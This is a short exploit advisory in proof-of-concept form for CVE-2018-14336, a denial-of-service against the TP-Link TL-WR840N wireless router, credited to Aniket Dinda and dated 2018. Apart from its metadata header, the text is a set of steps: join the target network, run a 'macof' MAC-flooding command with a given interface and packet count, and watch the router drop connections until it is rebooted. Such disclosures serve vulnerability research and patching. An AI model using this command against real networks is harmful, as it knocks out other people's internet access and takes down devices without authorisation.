# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow
# Date:- 2018-07-16
# Vendor Homepage:- https://www.tp-link.com/
# Hardware Link:-https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
# Version:- TP-Link Wireless N Router WR840N
# Category:- Hardware
# Exploit Author:-Aniket Dinda
# Tested on:- Linux
# CVE:- CVE-2018-14336
Proof Of Concept:-
1- First connect to this network
2- Open terminal => And Type"macof -i eth0 -n 10"
3- Hit Enter
4- You will see that your Net connection will lost.
1- You have to Reboot your router .